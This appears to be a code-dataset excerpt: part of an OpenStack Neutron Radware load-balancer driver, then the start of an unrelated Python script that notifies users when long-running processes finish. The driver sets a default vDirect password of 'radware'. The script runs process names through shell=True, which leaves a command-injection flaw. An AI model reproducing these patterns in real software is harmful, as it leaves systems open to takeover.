'vdirect.adc-service-specification+json'}
driver_opts = [
cfg.StrOpt('vdirect_address',
help=_('IP address of vDirect server.')),
cfg.StrOpt('ha_secondary_address',
help=_('IP address of secondary vDirect server.')),
cfg.StrOpt('vdirect_user',
default='vDirect',
help=_('vDirect user name.')),
cfg.StrOpt('vdirect_password',
default='radware',
help=_('vDirect user password.')),
cfg.StrOpt('service_adc_type',
default="VA",
help=_('Service ADC type. Default: VA.')),
cfg.StrOpt('service_adc_version',
default="",
help=_('Service ADC version.')),
cfg.BoolOpt('service_ha_pair',
default=False,
help=_('Enables or disables the Service HA pair. '
'Default: False.')),
cfg.IntOpt('service_throughput',
default=1000,
help=_('Service throughput. Default: 1000.')),
cfg.IntOpt('service_ssl_throughput',
default=100,
help=_('Service SSL throughput. Default: 100.')),
cfg.IntOpt('service_compression_throughput',
default=100,
help=_('Service compression throughput. Default: 100.')),
cfg.IntOpt('service_cache',
default=20,
help=_('Size of service cache. Default: 20.')),
cfg.StrOpt('l2_l3_workflow_name',
default='openstack_l2_l3',
help=_('Name of l2_l3 workflow. Default: '
'openstack_l2_l3.')),
cfg.StrOpt('l4_workflow_name',
default='openstack_l4',
help=_('Name of l4 workflow. Default: openstack_l4.')),
cfg.DictOpt('l2_l3_ctor_params',
default={"service": "_REPLACE_",
"ha_network_name": "HA-Network",
"ha_ip_pool_name": "default",
"allocate_ha_vrrp": True,
"allocate_ha_ips": True,
"twoleg_enabled": "_REPLACE_"},
help=_('Parameter for l2_l3 workflow constructor.')),
cfg.DictOpt('l2_l3_setup_params',
default={"data_port": 1,
"data_ip_address": "192.168.200.99",
"data_ip_mask": "255.255.255.0",
"gateway": "192.168.200.1",
"ha_port": 2},
help=_('Parameter for l2_l3 workflow setup.')),
cfg.ListOpt('actions_to_skip',
default=['setup_l2_l3'],
help=_('List of actions that are not pushed to '
'the completion queue.')),
cfg.StrOpt('l4_action_name',
default='BaseCreate',
help=_('Name of the l4 workflow action. '
'Default: BaseCreate.')),
cfg.ListOpt('service_resource_pool_ids',
default=[],
help=_('Resource pool IDs.')),
cfg.IntOpt('service_isl_vlan',
default=-1,
help=_('A required VLAN for the interswitch link to use.')),
cfg.BoolOpt('service_session_mirroring_enabled',
default=False,
help=_('Enable or disable Alteon interswitch link for '
'stateful session failover. Default: False.'))
]
cfg.CONF.register_opts(driver_opts, "radware")
class LoadBalancerDriver(abstract_driver.LoadBalancerAbstractDriver):
"""Radware lbaas driver."""
def __init__(self, plugin):
rad = cfg.CONF.radware
self.plugin = plugin
self.service = {
"haPair": rad.service_ha_pair,
"sessionMirroringEnabled": rad.service_session_mirroring_enabled,
"primary": {
"capacity": {
"throughput": rad.service_throughput,
"sslThroughput": rad.service_ssl_throughput,
"compressionThroughput":
rad.service_compression_throughput,
"cache": rad.service_cache
},
"network": {
"type": "portgroup",
"portgroups": ['DATA_NETWORK']
},
"adcType": rad.service_adc_type,
"acceptableAdc": "Exact"
}
}
if rad.service_resource_pool_ids:
ids = rad.service_resource_pool_ids
self.service['resourcePoolIds'] = [
{'name': id} for id in ids
]
if rad.service_isl_vlan:
self.service['islVlan'] = rad.service_isl_vlan
self.l2_l3_wf_name = rad.l2_l3_workflow_name
self.l4_wf_name = rad.l4_workflow_name
self.l2_l3_ctor_params = rad.l2_l3_ctor_params
self.l2_l3_setup_params = rad.l2_l3_setup_params
self.l4_action_name = rad.l4_action_name
self.actions_to_skip = rad.actions_to_skip
vdirect_address = rad.vdirect_address
sec_server = rad.ha_secondary_address
self.rest_client = vDirectRESTClient(server=vdirect_address,
secondary_server=sec_server,
user=rad.vdirect_user,
password=rad.vdirect_password)
self.queue = Queue.Queue()
self.completion_handler = OperationCompletionHandler(self.queue,
self.rest_client,
plugin)
self.workflow_templates_exists = False
self.completion_handler.setDaemon(True)
self.completion_handler_started = False
def _populate_vip_graph(self, context, vip):
ext_vip = self.plugin.populate_vip_graph(context, vip)
vip_network_id = self._get_vip_network_id(context, ext_vip)
pool_network_id = self._get_pool_network_id(context, ext_vip)
# if VIP and PIP are different, we need an IP address for the PIP
# so create port on PIP's network and use its IP address
if vip_network_id != pool_network_id:
pip_address = self._get_pip(
context,
vip['tenant_id'],
_make_pip_name_from_vip(vip),
pool_network_id,
ext_vip['pool']['subnet_id'])
ext_vip['pip_address'] = pip_address
else:
ext_vip['pip_address'] = vip['address']
ext_vip['vip_network_id'] = vip_network_id
ext_vip['pool_network_id'] = pool_network_id
return ext_vip
def create_vip(self, context, vip):
log_info = {'vip': vip,
'extended_vip': 'NOT_ASSIGNED',
'service_name': 'NOT_ASSIGNED'}
try:
ext_vip = self._populate_vip_graph(context, vip)
service_name = self._get_service(ext_vip)
log_info['extended_vip'] = ext_vip
log_info['service_name'] = service_name
self._create_workflow(
vip['pool_id'], self.l4_wf_name,
{"service": service_name})
self._update_workflow(
vip['pool_id'],
self.l4_action_name, ext_vip, context)
finally:
LOG.debug(_('vip: %(vip)s, '
'extended_vip: %(extended_vip)s, '
'service_name: %(service_name)s, '),
log_info)
def update_vip(self, context, old_vip, vip):
ext_vip = self._populate_vip_graph(context, vip)
self._update_workflow(
vip['pool_id'], self.l4_action_name,
ext_vip, context, False, lb_db.Vip, vip['id'])
def delete_vip(self, context, vip):
"""Delete a Vip
First delete it from the device. If deletion ended OK
- remove data from DB as well.
If the deletion failed - mark vip with error status in DB
"""
ext_vip = self._populate_vip_graph(context, vip)
params = _translate_vip_object_graph(ext_vip,
self.plugin, context)
ids = params.pop('__ids__')
try:
# get neutron port id associated with the vip (present if vip and
# pip are different) and release it after workflow removed
port_filter = {
'name': [_make_pip_name_from_vip(vip)],
}
ports = self.plugin._core_plugin.get_ports(context,
filters=port_filter)
if ports:
LOG.debug(_('Retrieved pip nport: %(port)r for '
'vip: %(vip)s'), {'port': ports[0],
'vip': vip['id']})
delete_pip_nport_function = self._get_delete_pip_nports(
context, ports)
else:
delete_pip_nport_function = None
LOG.debug(_('Found no pip nports associated with '
'vip: %s'), vip['id'])
# removing the WF will cause deletion of the configuration from the
# device
self._remove_workflow(ids, context, delete_pip_nport_function)
except r_exc.RESTRequestFailure:
pool_id = ext_vip['pool_id']
LOG.exception(_('Failed to remove workflow %s. '
'Going to set vip to ERROR status'),
pool_id)
self.plugin.update_status(context, lb_db.Vip, ids['vip'],
constants.ERROR)
def _get_delete_pip_nports(self, context, ports):
def _delete_pip_nports(success):
if success:
for port in ports:
try:
self.plugin._core_plugin.delete_port(
context, port['id'])
LOG.debug(_('pip nport id: %s'), port['id'])
except Exception as exception:
# stop exception propagation, nport may have
# been deleted by other means
LOG.warning(_('pip nport delete failed: %r'),
exception)
return _delete_pip_nports
def create_pool(self, context, pool):
# nothing to do
pass
def update_pool(self, context, old_pool, pool):
self._handle_pool(context, pool)
def delete_pool(self, context, pool,):
self._handle_pool(context, pool, delete=True)
def _handle_pool(self, context, pool, delete=False):
vip_id = self.plugin.get_pool(context, pool['id']).get('vip_id', None)
if vip_id:
if delete:
raise loadbalancer.PoolInUse(pool_id=pool['id'])
else:
vip = self.plugin.get_vip(context, vip_id)
ext_vip = self._populate_vip_graph(context, vip)
self._update_workflow(
pool['id'], self.l4_action_name,
ext_vip, context, delete, lb_db.Pool, pool['id'])
else:
if delete:
self.plugin._delete_db_pool(context, pool['id'])
else:
# we keep the pool in PENDING_UPDATE
# no point to modify it since it is not connected to vip yet
pass
def create_member(self, context, member):
self._handle_member(context, member)
def update_member(self, context, old_member, member):
self._handle_member(context, member)
def delete_member(self, context, member):
self._handle_member(context, member, delete=True)
def _handle_member(self, context, member, delete=False):
"""Navigate the model. If a Vip is found - activate a bulk WF action.
"""
vip_id = self.plugin.get_pool(
context, member['pool_id']).get('vip_id')
if vip_id:
vip = self.plugin.get_vip(context, vip_id)
ext_vip = self._populate_vip_graph(context, vip)
self._update_workflow(
member['pool_id'], self.l4_action_name,
ext_vip, context,
delete, lb_db.Member, member['id'])
# We have to delete this member but it is not connected to a vip yet
elif delete:
self.plugin._delete_db_member(context, member['id'])
def create_health_monitor(self, context, health_monitor):
# Anything to do here? the hm is not connected to the graph yet
pass
def update_pool_health_monitor(self, context, old_health_monitor,
health_monitor,
pool_id):
self._handle_pool_health_monitor(context, health_monitor, pool_id)
def create_pool_health_monitor(self, context,
health_monitor, pool_id):
self._handle_pool_health_monitor(context, health_monitor, pool_id)
def delete_pool_health_monitor(self, context, health_monitor, pool_id):
self._handle_pool_health_monitor(context, health_monitor, pool_id,
True)
def _handle_pool_health_monitor(self, context, health_monitor,
pool_id, delete=False):
"""Push a graph to vDirect
Navigate the model. Check if a pool is associated to the vip
and push the graph to vDirect
"""
vip_id = self.plugin.get_pool(context, pool_id).get('vip_id', None)
debug_params = {"hm_id": health_monitor['id'], "pool_id": pool_id,
"delete": delete, "vip_id": vip_id}
LOG.debug(_('_handle_pool_health_monitor. health_monitor = %(hm_id)s '
'pool_id = %(pool_id)s delete = %(delete)s '
'vip_id = %(vip_id)s'),
debug_params)
if vip_id:
vip = self.plugin.get_vip(context, vip_id)
ext_vip = self._populate_vip_graph(context, vip)
self._update_workflow(pool_id, self.l4_action_name,
ext_vip, context,
delete, lb_db.PoolMonitorAssociation,
health_monitor['id'])
elif delete:
self.plugin._delete_db_pool_health_monitor(context,
health_monitor['id'],
pool_id)
def stats(self, context, pool_id):
# TODO(avishayb) implement
return {"bytes_in": 0,
"bytes_out": 0,
"active_connections": 0,
"total_connections": 0}
def _get_vip_network_id(self, context, extended_vip):
subnet = self.plugin._core_plugin.get_subnet(
context, extended_vip['subnet_id'])
return subnet['network_id']
def _start_completion_handling_thread(self):
if not self.completion_handler_started:
LOG.info(_('Starting operation completion handling thread'))
self.completion_handler.start()
self.completion_handler_started = True
def _get_pool_network_id(self, context, extended_vip):
subnet = self.plugin._core_plugin.get_subnet(
context, extended_vip['pool']['subnet_id'])
return subnet['network_id']
@call_log.log
def _update_workflow(self, wf_name, action,
wf_params, context,
delete=False,
lbaas_entity=None, entity_id=None):
"""Update the WF state. Push the result to a queue for processing."""
if not self.workflow_templates_exists:
self._verify_workflow_templates()
if action not in self.actions_to_skip:
params = _translate_vip_object_graph(wf_params,
self.plugin,
context)
else:
params = wf_params
resource = '/api/workflow/%s/action/%s' % (wf_name, action)
response = _rest_wrapper(self.rest_client.call('POST', resource,
{'parameters': params},
TEMPLATE_HEADER))
LOG.debug(_('_update_workflow response: %s '), response)
if action not in self.actions_to_skip:
ids = params.pop('__ids__', None)
oper = OperationAttributes(response['uri'],
ids,
lbaas_entity,
entity_id,
delete=delete)
LOG.debug(_('Pushing operation %s to the queue'), oper)
self._start_completion_handling_thread()
self.queue.put_nowait(oper)
def _remove_workflow(self, ids, context, post_remove_function):
wf_name = ids['pool']
LOG.debug(_('Remove the workflow %s') % wf_name)
resource = '/api/workflow/%s' % (wf_name)
rest_return = self.rest_client.call('DELETE', resource, None, None)
response = _rest_wrapper(rest_return, [204, 202, 404])
if rest_return[RESP_STATUS] == 404:
if post_remove_function:
try:
post_remove_function(True)
LOG.debug(_('Post-remove workflow function '
'%r completed'), post_remove_function)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_('Post-remove workflow function '
'%r failed'), post_remove_function)
self.plugin._delete_db_vip(context, ids['vip'])
else:
oper = OperationAttributes(
response['uri'],
ids,
lb_db.Vip,
ids['vip'],
delete=True,
post_op_function=post_remove_function)
LOG.debug(_('Pushing operation %s to the queue'), oper)
self._start_completion_handling_thread()
self.queue.put_nowait(oper)
def _remove_service(self, service_name):
resource = '/api/service/%s' % (service_name)
_rest_wrapper(self.rest_client.call('DELETE',
resource, None, None),
[202])
def _get_service(self, ext_vip):
"""Get a service name.
if you can't find one,
create a service and create l2_l3 WF.
"""
if not self.workflow_templates_exists:
self._verify_workflow_templates()
if ext_vip['vip_network_id'] != ext_vip['pool_network_id']:
networks_name = '%s_%s' % (ext_vip['vip_network_id'],
ext_vip['pool_network_id'])
self.l2_l3_ctor_params["twoleg_enabled"] = True
else:
networks_name = ext_vip['vip_network_id']
self.l2_l3_ctor_params["twoleg_enabled"] = False
incoming_service_name = 'srv_%s' % (networks_name,)
service_name = self._get_available_service(incoming_service_name)
if not service_name:
LOG.debug(
'Could not find a service named ' + incoming_service_name)
service_name = self._create_service(ext_vip['vip_network_id'],
ext_vip['pool_network_id'],
ext_vip['tenant_id'])
self.l2_l3_ctor_params["service"] = incoming_service_name
wf_name = 'l2_l3_' + networks_name
self._create_workflow(
wf_name, self.l2_l3_wf_name, self.l2_l3_ctor_params)
self._update_workflow(
wf_name, "setup_l2_l3", self.l2_l3_setup_params, None)
else:
LOG.debug('A service named ' + service_name + ' was found.')
return service_name
def _create_service(self, vip_network_id, pool_network_id, tenant_id):
"""create the service and provision it (async)."""
# 1) create the service
service = copy.deepcopy(self.service)
if vip_network_id != pool_network_id:
service_name = 'srv_%s_%s' % (vip_network_id, pool_network_id)
service['primary']['network']['portgroups'] = [vip_network_id,
pool_network_id]
else:
service_name = 'srv_' + vip_network_id
service['primary']['network']['portgroups'] = [vip_network_id]
resource = '/api/service?name=%s&tenant=%s' % (service_name, tenant_id)
response = _rest_wrapper(self.rest_client.call('POST', resource,
service,
CREATE_SERVICE_HEADER), [201])
# 2) provision the service
provision_uri = response['links']['actions']['provision']
_rest_wrapper(self.rest_client.call('POST', provision_uri,
None, PROVISION_HEADER))
return service_name
def _get_available_service(self, service_name):
"""Check if service exists and return its name if it does."""
resource = '/api/service/' + service_name
try:
_rest_wrapper(self.rest_client.call('GET',
resource,
None, None), [200])
except Exception:
return
return service_name
def _workflow_exists(self, pool_id):
"""Check if a WF having the name of the pool_id exists."""
resource = '/api/workflow/' + pool_id
try:
_rest_wrapper(self.rest_client.call('GET',
resource,
None,
None), [200])
except Exception:
return False
return True
def _create_workflow(self, wf_name, wf_template_name,
create_workflow_params=None):
"""Create a WF if it doesn't exists yet."""
if not self.workflow_templates_exists:
self._verify_workflow_templates()
if not self._workflow_exists(wf_name):
if not create_workflow_params:
create_workflow_params = {}
resource = '/api/workflowTemplate/%s?name=%s' % (
wf_template_name, wf_name)
params = {'parameters': create_workflow_params}
response = _rest_wrapper(self.rest_client.call('POST',
resource,
params,
TEMPLATE_HEADER))
LOG.debug(_('create_workflow response: %s'), str(response))
def _verify_workflow_templates(self):
"""Verify the existence of workflows on vDirect server."""
workflows = {self.l2_l3_wf_name:
False, self.l4_wf_name: False}
resource = '/api/workflowTemplate'
response = _rest_wrapper(self.rest_client.call('GET',
resource,
None,
None), [200])
for wf in workflows.keys():
for wf_template in response:
if wf == wf_template['name']:
workflows[wf] = True
break
for wf, found in workflows.items():
if not found:
raise r_exc.WorkflowMissing(workflow=wf)
self.workflow_templates_exists = True
def _get_pip(self, context, tenant_id, port_name,
network_id, subnet_id):
"""Get proxy IP
Creates or get port on network_id, returns that port's IP
on the subnet_id.
"""
port_filter = {
'name': [port_name],
}
ports = self.plugin._core_plugin.get_ports(context,
filters=port_filter)
if not ports:
# create port, we just want any IP allocated to the port
# based on the network id and subnet_id
port_data = {
'tenant_id': tenant_id,
'name': port_name,
'network_id': network_id,
'mac_address': attributes.ATTR_NOT_SPECIFIED,
'admin_state_up': False,
'device_id': '',
'device_owner': 'neutron:' + constants.LOADBALANCER,
'fixed_ips': [{'subnet_id': subnet_id}]
}
port = self.plugin._core_plugin.create_port(context,
{'port': port_data})
else:
port = ports[0]
ips_on_subnet = [ip for ip in port['fixed_ips']
if ip['subnet_id'] == subnet_id]
if not ips_on_subnet:
raise Exception(_('Could not find or allocate '
'IP address for subnet id %s'),
subnet_id)
else:
return ips_on_subnet[0]['ip_address']
class vDirectRESTClient:
"""REST server proxy to Radware vDirect."""
def __init__(self,
server='localhost',
secondary_server=None,
user=None,
password=None,
port=2189,
ssl=True,
timeout=5000,
base_uri=''):
self.server = server
self.secondary_server = secondary_server
self.port = port
self.ssl = ssl
self.base_uri = base_uri
self.timeout = timeout
if user and password:
self.auth = base64.encodestring('%s:%s' % (user, password))
self.auth = self.auth.replace('\n', '')
else:
raise r_exc.AuthenticationMissing()
debug_params = {'server': self.server,
'sec_server': self.secondary_server,
'port': self.port,
'ssl': self.ssl}
LOG.debug(_('vDirectRESTClient:init server=%(server)s, '
'secondary server=%(sec_server)s, '
'port=%(port)d, '
'ssl=%(ssl)r'), debug_params)
def _flip_servers(self):
LOG.warning(_('Fliping servers. Current is: %(server)s, '
'switching to %(secondary)s'),
{'server': self.server,
'secondary': self.secondary_server})
self.server, self.secondary_server = self.secondary_server, self.server
def _recover(self, action, resource, data, headers, binary=False):
if self.server and self.secondary_server:
self._flip_servers()
resp = self._call(action, resource, data,
headers, binary)
return resp
else:
LOG.exception(_('REST client is not able to recover '
'since only one vDirect server is '
'configured.'))
return -1, None, None, None
def call(self, action, resource, data, headers, binary=False):
resp = self._call(action, resource, data, headers, binary)
if resp[RESP_STATUS] == -1:
LOG.warning(_('vDirect server is not responding (%s).'),
self.server)
return self._recover(action, resource, data, headers, binary)
elif resp[RESP_STATUS] in (301, 307):
LOG.warning(_('vDirect server is not active (%s).'),
self.server)
return self._recover(action, resource, data, headers, binary)
else:
return resp
@call_log.log
def _call(self, action, resource, data, headers, binary=False):
if resource.startswith('http'):
uri = resource
else:
uri = self.base_uri + resource
if binary:
body = data
else:
body = jsonutils.dumps(data)
debug_data = 'binary' if binary else body
debug_data = debug_data if debug_data else 'EMPTY'
if not headers:
headers = {'Authorization': 'Basic %s' % self.auth}
else:
headers['Authorization'] = 'Basic %s' % self.auth
conn = None
if self.ssl:
conn = httplib.HTTPSConnection(
self.server, self.port, timeout=self.timeout)
if conn is None:
LOG.error(_('vdirectRESTClient: Could not establish HTTPS '
'connection'))
return 0, None, None, None
else:
conn = httplib.HTTPConnection(
self.server, self.port, timeout=self.timeout)
if conn is None:
LOG.error(_('vdirectRESTClient: Could not establish HTTP '
'connection'))
return 0, None, None, None
try:
conn.request(action, uri, body, headers)
response = conn.getresponse()
respstr = response.read()
respdata = respstr
try:
respdata = jsonutils.loads(respstr)
except ValueError:
# response was not JSON, ignore the exception
pass
ret = (response.status, response.reason, respstr, respdata)
except Exception as e:
log_dict = {'action': action, 'e': e}
LOG.error(_('vdirectRESTClient: %(action)s failure, %(e)r'),
log_dict)
ret = -1, None, None, None
conn.close()
return ret
class OperationAttributes:
"""Holds operation attributes.
The parameter 'post_op_function' (if supplied) is a function that takes
one boolean argument, specifying the success of the operation
"""
def __init__(self,
operation_url,
object_graph,
lbaas_entity=None,
entity_id=None,
delete=False,
post_op_function=None):
self.operation_url = operation_url
self.object_graph = object_graph
self.delete = delete
self.lbaas_entity = lbaas_entity
self.entity_id = entity_id
self.creation_time = time.time()
self.post_op_function = post_op_function
def __repr__(self):
items = ("%s = %r" % (k, v) for k, v in self.__dict__.items())
return "<%s: {%s}>" % (self.__class__.__name__, ', '.join(items))
class OperationCompletionHandler(threading.Thread):
"""Update DB with operation status or delete the entity from DB."""
def __init__(self, queue, rest_client, plugin):
threading.Thread.__init__(self)
self.queue = queue
self.rest_client = rest_client
self.plugin = plugin
self.stoprequest = threading.Event()
self.opers_to_handle_before_rest = 0
def join(self, timeout=None):
self.stoprequest.set()
super(OperationCompletionHandler, self).join(timeout)
def handle_operation_completion(self, oper):
result = self.rest_client.call('GET',
oper.operation_url,
None,
None)
completed = result[RESP_DATA]['complete']
reason = result[RESP_REASON],
description = result[RESP_STR]
if completed:
# operation is done - update the DB with the status
# or delete the entire graph from DB
success = result[RESP_DATA]['success']
sec_to_completion = time.time() - oper.creation_time
debug_data = {'oper': oper,
'sec_to_completion': sec_to_completion,
'success': success}
LOG.debug(_('Operation %(oper)s is completed after '
'%(sec_to_completion)d sec '
'with success status: %(success)s :'),
debug_data)
db_status = None
if not success:
# failure - log it and set the return ERROR as DB state
if reason or description:
msg = 'Reason:%s. Description:%s' % (reason, description)
else:
msg = "unknown"
error_params = {"operation": oper, "msg": msg}
LOG.error(_('Operation %(operation)s failed. Reason: %(msg)s'),
error_params)
db_status = constants.ERROR
else:
if oper.delete:
_remove_object_from_db(self.plugin, oper)
else:
db_status = constants.ACTIVE
if db_status:
_update_vip_graph_status(self.plugin, oper, db_status)
OperationCompletionHandler._run_post_op_function(success, oper)
return completed
def run(self):
while not self.stoprequest.isSet():
try:
oper = self.queue.get(timeout=1)
# Get the current queue size (N) and set the counter with it.
# Handle N operations with no intermission.
# Once N operations handles, get the size again and repeat.
if self.opers_to_handle_before_rest <= 0:
self.opers_to_handle_before_rest = self.queue.qsize() + 1
LOG.debug('Operation consumed from the queue: ' +
str(oper))
# check the status - if oper is done: update the db ,
# else push the oper again to the queue
if not self.handle_operation_completion(oper):
LOG.debug(_('Operation %s is not completed yet..') % oper)
# Not completed - push to the queue again
self.queue.put_nowait(oper)
self.queue.task_done()
self.opers_to_handle_before_rest -= 1
# Take one second rest before start handling
# new operations or operations handled before
if self.opers_to_handle_before_rest <= 0:
time.sleep(1)
except Queue.Empty:
continue
except Exception:
m = _("Exception was thrown inside OperationCompletionHandler")
LOG.exception(m)
@staticmethod
def _run_post_op_function(success, oper):
if oper.post_op_function:
log_data = {'func': oper.post_op_function, 'oper': oper}
try:
oper.post_op_function(success)
LOG.debug(_('Post-operation function '
'%(func)r completed '
'after operation %(oper)r'),
log_data)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_('Post-operation function '
'%(func)r failed '
'after operation %(oper)r'),
log_data)
def _rest_wrapper(response, success_codes=[202]):
"""Wrap a REST call and make sure a valid status is returned."""
if not response:
raise r_exc.RESTRequestFailure(
status=-1,
reason="Unknown",
description="Unknown",
success_codes=success_codes
)
elif response[RESP_STATUS] not in success_codes:
raise r_exc.RESTRequestFailure(
status=response[RESP_STATUS],
reason=response[RESP_REASON],
description=response[RESP_STR],
success_codes=success_codes
)
else:
return response[RESP_DATA]
def _make_pip_name_from_vip(vip):
"""Standard way of making PIP name based on VIP ID."""
return 'pip_' + vip['id']
def _update_vip_graph_status(plugin, oper, status):
"""Update the status
Of all the Vip object graph
or a specific entity in the graph.
"""
ctx = context.get_admin_context(load_admin_roles=False)
LOG.debug(_('_update: %s '), oper)
if oper.lbaas_entity == lb_db.PoolMonitorAssociation:
plugin.update_pool_health_monitor(ctx,
oper.entity_id,
oper.object_graph['pool'],
status)
elif oper.entity_id:
plugin.update_status(ctx,
oper.lbaas_entity,
oper.entity_id,
status)
else:
_update_vip_graph_status_cascade(plugin,
oper.object_graph,
ctx, status)
def _update_vip_graph_status_cascade(plugin, ids, ctx, status):
plugin.update_status(ctx,
lb_db.Vip,
ids['vip'],
status)
plugin.update_status(ctx,
lb_db.Pool,
ids['pool'],
status)
for member_id in ids['members']:
plugin.update_status(ctx,
lb_db.Member,
member_id,
status)
for hm_id in ids['health_monitors']:
plugin.update_pool_health_monitor(ctx,
hm_id,
ids['pool'],
status)
def _remove_object_from_db(plugin, oper):
"""Remove a specific entity from db."""
LOG.debug(_('_remove_object_from_db %s'), str(oper))
ctx = context.get_admin_context(load_admin_roles=False)
if oper.lbaas_entity == lb_db.PoolMonitorAssociation:
plugin._delete_db_pool_health_monitor(ctx,
oper.entity_id,
oper.object_graph['pool'])
elif oper.lbaas_entity == lb_db.Member:
plugin._delete_db_member(ctx, oper.entity_id)
elif oper.lbaas_entity == lb_db.Vip:
plugin._delete_db_vip(ctx, oper.entity_id)
elif oper.lbaas_entity == lb_db.Pool:
plugin._delete_db_pool(ctx, oper.entity_id)
else:
raise r_exc.UnsupportedEntityOperation(
operation='Remove from DB', entity=oper.lbaas_entity
)
TRANSLATION_DEFAULTS = {'session_persistence_type': 'none',
'session_persistence_cookie_name': 'none',
'url_path': '/',
'http_method': 'GET',
'expected_codes': '200',
'subnet': '255.255.255.255',
'mask': '255.255.255.255',
'gw': '255.255.255.255',
}
VIP_PROPERTIES = ['address', 'protocol_port', 'protocol', 'connection_limit',
'admin_state_up', 'session_persistence_type',
'session_persistence_cookie_name']
POOL_PROPERTIES = ['protocol', 'lb_method', 'admin_state_up']
MEMBER_PROPERTIES = ['address', 'protocol_port', 'weight', 'admin_state_up',
'subnet', 'mask', 'gw']
HEALTH_MONITOR_PROPERTIES = ['type', 'delay', 'timeout', 'max_retries',
'admin_state_up', 'url_path', 'http_method',
'expected_codes', 'id']
def _translate_vip_object_graph(extended_vip, plugin, context):
"""Translate the extended vip
translate to a structure that can be
understood by the workflow.
"""
def _create_key(prefix, property_name):
return prefix + '_' + property_name + '_array'
def _trans_prop_name(prop_name):
if prop_name == 'id':
return 'uuid'
else:
return prop_name
def get_ids(extended_vip):
ids = {}
ids['vip'] = extended_vip['id']
ids['pool'] = extended_vip['pool']['id']
ids['members'] = [m['id'] for m in extended_vip['members']]
ids['health_monitors'] = [
hm['id'] for hm in extended_vip['health_monitors']
]
return ids
trans_vip = {}
LOG.debug('Vip graph to be translated: ' + str(extended_vip))
for vip_property in VIP_PROPERTIES:
trans_vip['vip_' + vip_property] = extended_vip.get(
vip_property, TRANSLATION_DEFAULTS.get(vip_property))
for pool_property in POOL_PROPERTIES:
trans_vip['pool_' + pool_property] = extended_vip[
'pool'][pool_property]
for member_property in MEMBER_PROPERTIES:
trans_vip[_create_key('member', member_property)] = []
two_leg = (extended_vip['pip_address'] != extended_vip['address'])
if two_leg:
pool_subnet = plugin._core_plugin.get_subnet(
context, extended_vip['pool']['subnet_id'])
for member in extended_vip['members']:
if member['status'] != constants.PENDING_DELETE:
if (two_leg and netaddr.IPAddress(member['address'])
not in netaddr.IPNetwork(pool_subnet['cidr'])):
member_ports = plugin._core_plugin.get_ports(
context,
filters={'fixed_ips': {'ip_address': [member['address']]},
'tenant_id': [extended_vip['tenant_id']]})
if len(member_ports) == 1:
member_subnet = plugin._core_plugin.get_subnet(
context,
member_ports[0]['fixed_ips'][0]['subnet_id'])
member_network = netaddr.IPNetwork(member_subnet['cidr'])
member['subnet'] = str(member_network.network)
member['mask'] = str(member_network.netmask)
else:
member['subnet'] = member['address']
member['gw'] = pool_subnet['gateway_ip']
for member_property in MEMBER_PROPERTIES:
trans_vip[_create_key('member', member_property)].append(
member.get(member_property,
TRANSLATION_DEFAULTS.get(member_property)))
for hm_property in HEALTH_MONITOR_PROPERTIES:
trans_vip[
_create_key('hm', _trans_prop_name(hm_property))] = []
for hm in extended_vip['health_monitors']:
hm_pool = plugin.get_pool_health_monitor(context,
hm['id'],
extended_vip['pool']['id'])
if hm_pool['status'] != constants.PENDING_DELETE:
for hm_property in HEALTH_MONITOR_PROPERTIES:
value = hm.get(hm_property,
TRANSLATION_DEFAULTS.get(hm_property))
trans_vip[_create_key('hm',
_trans_prop_name(hm_property))].append(value)
ids = get_ids(extended_vip)
trans_vip['__ids__'] = ids
for key in ['pip_address']:
if key in extended_vip:
trans_vip[key] = extended_vip[key]
LOG.debug('Translated Vip graph: ' + str(trans_vip))
return trans_vip
|
shakamunyi/neutron-vrrp
|
neutron/services/loadbalancer/drivers/radware/driver.py
|
Python
|
apache-2.0
| 45,498 | 0.000374 |
'''longtroll: Notify you when your long-running processes finish.'''
import argparse
import getpass
import os
import pickle
import re
import subprocess
import time
collapse_whitespace_re = re.compile('[ \t][ \t]*')
def spawn_notify(notifier, proc_ended):
cmd = notifier.replace('<cmd>', proc_ended[0])
cmd = cmd.replace('<pid>', str(proc_ended[1]))
subprocess.Popen(cmd, shell=True)
def get_user_processes(user):
def line_to_dict(line):
line = re.sub(collapse_whitespace_re, ' ', line).strip()
time, pid, ppid, command = line.split(' ', 3)
try:
return {
'age': etime_to_secs(time),
'pid': int(pid),
'ppid': int(ppid),
'command': command,
}
except Exception:
print('Caught exception for line: %s' % line)
raise
ps_out = subprocess.Popen(' '.join([
'ps', '-U %s' % user, '-o etime,pid,ppid,command']),
shell=True, stdout=subprocess.PIPE).communicate()[0]
for line in ps_out.split('\n')[1:]:
if line: yield line_to_dict(line)
def etime_to_secs(etime):
'Parsing etimes is rougher than it should be.'
seconds = 0
etime = etime.split('-')
if len(etime) == 2:
seconds += int(etime[0]) * 24 * 60 * 60
etime = etime[1]
else:
etime = etime[0]
etime = etime.split(':')
if len(etime) == 3:
seconds += int(etime[0]) * 60 * 60
mins, secs = etime[1:]
else:
mins, secs = etime
seconds += 60 * int(mins) + int(secs)
return seconds
def filter_by_parent(ppid, procs):
return (proc for proc in procs if proc['ppid'] == ppid)
def filter_by_min_age(min_age, procs):
return (proc for proc in procs if proc['age'] >= min_age)
def long_procs(ppid, min_age):
user_processes = get_user_processes(getpass.getuser())
user_procs_with_parent = filter_by_parent(ppid, user_processes)
user_procs_with_min_age = filter_by_min_age(min_age, user_procs_with_parent)
return set(
(proc['command'], proc['pid']) for proc in user_procs_with_min_age)
def main():
import sys
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
'--config_file', '-c', metavar='FILE', default='~/.longtrollrc',
help='Configuration file to load')
parser.add_argument(
'--ppid', '-p', default=os.getppid(), type=int,
help='The parent PID of processes to notify for. Defaults to the parent '
'PID of longtroll (usually the PID of your shell).')
parser.add_argument('mode', action='store', help='Either "bind" or "watch"')
args = parser.parse_args()
options_dict = {}
try:
with open(os.path.expanduser(args.config_file)) as config_file:
for line in config_file:
key, val = line.split(' ', 1)
options_dict[key] = val
except IOError:
print('Could not read config file:')
raise
if 'seconds' not in options_dict:
print('Must specify "seconds" option in config file')
return
if 'notify' not in options_dict:
print('Must specify "notify" option in config file')
return
min_age = int(options_dict['seconds'])
notify = options_dict['notify']
if args.mode == 'watch':
last_procs = long_procs(args.ppid, min_age)
while True:
procs = long_procs(args.ppid, min_age)
ended_procs = last_procs - procs
if ended_procs:
for proc in ended_procs:
spawn_notify(notify, proc)
last_procs = procs
time.sleep(3)
else:
cmd = 'python %s --config_file %s --ppid %d watch' % (
__file__, args.config_file, args.ppid)
